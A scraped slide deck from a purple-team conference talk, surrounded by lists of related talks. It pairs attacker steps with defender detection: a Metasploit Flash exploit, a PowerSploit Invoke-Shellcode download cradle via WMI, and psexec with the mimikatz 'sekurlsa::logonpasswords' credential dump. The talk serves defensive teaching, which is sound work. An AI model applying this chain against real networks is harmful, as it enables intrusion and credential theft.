Pentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 EditionPentest Apocalypse - SANSFIRE 2016 Edition
Pentest Apocalypse - SANSFIRE 2016 Edition
 
Next generation pentest your company cannot buy
Next generation pentest your company cannot buyNext generation pentest your company cannot buy
Next generation pentest your company cannot buy
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
penetest VS. APT
penetest VS. APTpenetest VS. APT
penetest VS. APT
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 

Similar to Purple View

DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerJorge Orchilles
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 MatrixJorge Orchilles
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpConJorge Orchilles
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixJorge Orchilles
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamersjasonjfrank
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Mauricio Velazco
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaMauricio Velazco
 
BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!CiNPA Security SIG
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the TorchWill Schroeder
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
 
Evolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV ConferenceEvolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV ConferenceJorge Orchilles
 
External Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersExternal Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersJorge Orchilles
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterEqual Experts
 
Wordpress security
Wordpress securityWordpress security
Wordpress securityMehmet Ince
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion DetectionAPNIC
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara
 

Similar to Purple View (20)

DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLockerDEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix8.8 Las Vegas - Adversary Emulation con C2 Matrix
8.8 Las Vegas - Adversary Emulation con C2 Matrix
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpCon
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue TeamersGo Hack Yourself - 10 Pen Test Tactics for Blue Teamers
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers
 
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
Defcon Blue Team Village 2020: Purple On My Mind: Cost Effective Automated Ad...
 
ETHICAL HACKING
ETHICAL HACKING ETHICAL HACKING
ETHICAL HACKING
 
PurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal AsiaPurpleSharp BlackHat Arsenal Asia
PurpleSharp BlackHat Arsenal Asia
 
BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!
 
Network security
Network securityNetwork security
Network security
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
 
Evolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV ConferenceEvolution of Offensive Assessments - SecureWV Conference
Evolution of Offensive Assessments - SecureWV Conference
 
External Threat Hunters are Red Teamers
External Threat Hunters are Red TeamersExternal Threat Hunters are Red Teamers
External Threat Hunters are Red Teamers
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building Better
 
Wordpress security
Wordpress securityWordpress security
Wordpress security
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
 

More from Haydn Johnson

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkHaydn Johnson
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-finalHaydn Johnson
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about itHaydn Johnson
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Haydn Johnson
 
UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017Haydn Johnson
 
PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017Haydn Johnson
 
Phishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonPhishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonHaydn Johnson
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHaydn Johnson
 
Nolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonNolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonHaydn Johnson
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awarenessHaydn Johnson
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthroughHaydn Johnson
 

More from Haydn Johnson (11)

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalk
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-final
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about it
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018
 
UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017
 
PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017
 
Phishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonPhishing dc618 haydnjohnson
Phishing dc618 haydnjohnson
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
 
Nolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonNolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnson
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awareness
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthrough
 

Recently uploaded

Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 

Recently uploaded (20)

Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 

Purple View

  • 1. Purple View The recent trend of using Attack and Defense Together Not OUR idea - backed by many @raffertylaura | @haydnjohnson
  • 2. Quick who are we Haydn Johnson @haydnjohnson OSCP Offensive/Attack Interest Enjoys presenting Laura @raffertylaura MSc Computer Science (Security/Privacy) Interested in both sides of security Loooooves presenting @raffertylaura | @haydnjohnson
  • 3. Contents 1. Basic Term Definition 2. Introduction to Red, Blue and Purple 3. Run through of an Attack ○ Gaining Access ○ Lateral Movement ○ Domain Admin ○ Maintaining Access ○ Data Exfiltration 4. For each attack: ○ Attacking View ○ Defenders View ○ Possible Purple Team exercises @raffertylaura | @haydnjohnson
  • 4. Definitions Exploit - The thing used to gain unauthorized access to a system Payload - What is done after the access is gained (shell, command) Metasploit - An open source exploit framework, modular Meterpreter - an advanced, extensible payload that uses in-memory DLL injection Shell - Gaining Terminal/CMD access remotely https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ http://www.metasploit.com/
  • 5. Red Team - Penetration | Offensive ● Scans ● Exploits ● Logic abuse ● Access to things they shouldn’t @raffertylaura | @haydnjohnson
  • 6. Blue Team - Block, Prevent, Detect | Defensive ● Logs ● Emails ● Events ● Triggers ● Networking ● More Logs @raffertylaura | @haydnjohnson
  • 7. Red Team - Goals ● Model recent threats and trends ● Longer term ● Highlight Gaps in Security Controls, detection etc ● Escape and Evade for Persistence @raffertylaura | @haydnjohnson
  • 8. Blue Team - Goals ● Detect Attack ● Respond and Recover ● Produce Actionable Intelligence ● Identify Gaps and investment needs @raffertylaura | @haydnjohnson
  • 9. Purple Team - Offensive & Defensive Working together to achieve the ultimate goal of making the organization more secure ● Exposes blue team to different threats & attacker mindset ● Test incident detection and response ● Allows red team to sharpen skills ● Policy and procedures tested ● Tuning of controls @raffertylaura | @haydnjohnson
  • 10. Purple Team - Offensive & Defensive Different types of Purple Teaming ● Read Team Sitting with Network Defense team ● Adversary Simulation ● Traffic Generation ● cobaltstrike.com ● Wargaming Requires total picture involving all areas of the organization @raffertylaura | @haydnjohnson
  • 11. Purple Team - The difference ● Using Security Posture and Weaknesses to find what is most valuable ● Goal Oriented ● Review attack ● Test how teams use services and how they are managed @raffertylaura | @haydnjohnson
  • 12. Purple Team - The difference ● Time to Domain Admin ● Time to Data/Objective ● Time to Respond ● Time to Recover ● Identify where there needs to be more investment ● Measure Impact Done right, the blue team should come out with better monitoring and response plans. @raffertylaura | @haydnjohnson
  • 13. Purple Team - The difference ● Set up a fake scenario - Assume Breach ● How will the attacker gain access? ● Why have they attacked, what do they want? ● How did they move through the network? ● If they exfiltrated data, how? Do not turn off servers, block IP addresses, make it realistic @raffertylaura | @haydnjohnson
  • 14. Purple Team - Exercise “In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.” - Raphael Mudge http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/ @raffertylaura | @haydnjohnson
  • 15. Purple Team - DEMO (step by step) Our exercise @raffertylaura | @haydnjohnson
  • 16. Purple Team - Demo Architecture @raffertylaura | @haydnjohnson Domain: corp.test.com
  • 17. Tools Used Red Team: ● Kali Linux ● Metasploit ● Meterpreter ● PowerSploit ● Twittor Blue Team: ● Wireshark ● Windows Event Logs @raffertylaura | @haydnjohnson
  • 18. Setting up Windows GP @raffertylaura | @haydnjohnson
  • 19. Gaining Access Hacking Team Flash Exploit @raffertylaura | @haydnjohnson
  • 20. Flash Exploits @raffertylaura | @haydnjohnson ● Flash plugins are vulnerable ○ You can embed a javascript/binary within a Flash file ○ ActionScript to define events to redirect to landing page ● Most exploit kit landing pages redirect to pages containing Flash exploits ○ Angler ○ Nuclear ○ Fiesta ● Installed by default on browser ● New vulnerabilities are identified on almost a weekly basis
  • 21. Gaining Access @raffertylaura | @haydnjohnson Flash 18.0.0.194
  • 22. A: Flash Exploit from SecurityFocus Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
  • 23. A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
  • 24. A: Start Flash Exploit from Kali @raffertylaura | @haydnjohnson
  • 25. Client1 User navigates to malicious site which redirects to the exploit A: Redirect Victim @raffertylaura | @haydnjohnson
  • 26. A: Client1 is exploited @raffertylaura | @haydnjohnson
  • 27. A: A session is now established with Client1 We can now run Meterpreter @raffertylaura | @haydnjohnson
  • 28. B: Wireshark: Landing Page and Redirect @raffertylaura | @haydnjohnson
  • 30. B: What can you take away Security Onion, implement it, free Has snort rules for Flash exploits (need to install) Confirm if flash is needed for business reasons Keep flash updated 2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules) 2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules) @raffertylaura | @haydnjohnson https://www.security-database.com/detail.php?alert=CVE-2015-5119 https://security-onion-solutions.github.io/security-onion/
  • 31. Purple Team - Exercise ● Blue team understands how attackers can gain initial access ● Flash exploits - ongoing issue ● Helps blue team to identify suspicious traffic and what is happening from the attacker perspective ● Red team sees how attacks are visible by blue team and think of ways to make it more stealthy @raffertylaura | @haydnjohnson
  • 33. Privilege Escalation ● We are skipping privilege escalation from Domain User to Local Admin @raffertylaura | @haydnjohnson
  • 35. A: PowerSploit Available on Github Open Source https://github.com/mattifestation/PowerSploit @raffertylaura | @haydnjohnson
  • 36. A: PowerSploit More than 1 script! PowerShell Modules @raffertylaura | @haydnjohnson
  • 37. PowerView Part of PowerShell Empire Very advanced https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView @raffertylaura | @haydnjohnson
  • 38. A: Lateral Movement The same local Administrator account passwords on multiple computers. by Sean Metcalf https://adsecurity.org/?p=1684 @raffertylaura | @haydnjohnson
  • 39. Same Passwords for All Local Admins
  • 41. A: Lateral Movement Powersploit Remote Powershell Using Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
  • 42. A: Base64 Encoding Payload Remove issues with whitespace The Hacker Playbook 1 (now 2) @raffertylaura | @haydnjohnson http://thehackerplaybook.com/dashboard/
  • 43. A: Hosting Powersploit Invoke--Shellcode.ps1 PowerSploit code hosted on local Kali machine @raffertylaura | @haydnjohnson
  • 44. A: Invoke-WmiMethod Use powershell to connect remotely, create a new process and launch the IEX cradle. Calls Windows Management Instrumentation (WMI) methods. The Win32_Process WMI class allows creation of a process. @raffertylaura | @haydnjohnson
  • 45. A: Execute Remote command Execute command from Client1 to tell Client2 to download and execute shellcode @raffertylaura | @haydnjohnson
  • 46. A: Client1 gives same password Same password across multiple clients @raffertylaura | @haydnjohnson
  • 48. B: WireShark traffic TCP Hand Shake Bind Requests @raffertylaura | @haydnjohnson
  • 49. B: Client1 requests remote instance on Client2 @raffertylaura | @haydnjohnson
  • 50. B: Client2 eventually asks where is Kali @raffertylaura | @haydnjohnson
  • 51. B: Client2 downloads Invoke--Shellcode.ps1 @raffertylaura | @haydnjohnson
  • 52. B: Client1 logs into Client2 @raffertylaura | @haydnjohnson
  • 53. B: PowerShell Process Created @raffertylaura | @haydnjohnson
  • 54. B: PowerShell connects to Kali Client2 reaches out to Kali on port 80 @raffertylaura | @haydnjohnson
  • 55. B: What can you take away Event Correlation - based on event ID, source and destination for remote connections Implement alerting based on Security Events together SIEM can/SHOULD do this Use Log MD - really great logging tool, especially for powershell @raffertylaura | @haydnjohnson http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting- through-the-junk http://malwarearchaeology.squarespace.com/log-md/
  • 56. Purple Team - Benefits ● Identify ways to move around the network ● Identify and confirm Defensive Controls in Place ● Identify what worked, what did not ● Implement changes ● Justification for resources @raffertylaura | @haydnjohnson
  • 57. Privilege Escalation Local Admin to Domain Admin @raffertylaura | @haydnjohnson
  • 58. A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson ● Why escalate privileges from Local Admin to Domain Admin? ● Domain admin - control over active directory! ● Access IT resources ● Create accounts ● Propagate malware
  • 59. A: Local Admin to Domain Admin @raffertylaura | @haydnjohnson
  • 60. A: Local Admin to Domain Admin From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll @raffertylaura | @haydnjohnson
  • 61. A: Local Admin to Domain Admin Use psexec to run mimikatz.exe on Client2 @raffertylaura | @haydnjohnson
  • 62. A: Local Admin to Domain Admin Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2! @raffertylaura | @haydnjohnson
  • 64. B: Event Logs Client1 logs into Client2 local admin
  • 65. B: Event Logs Client1 runs mimikatz on Client2 @raffertylaura | @haydnjohnson
  • 66. B: Event Logs Sensitive privilege use from Client1 to Client2
  • 67. B: What can you take away ● Prevention: ○ Access control for shared drive ○ Limit access to psexec and monitor use ○ Active Directory best practices ● Detection: ○ IDS signatures ○ SIEM use case - Event correlation between system logs and network proxy logs ○ For lateral movement: enable file level auditing ○ Canary accounts
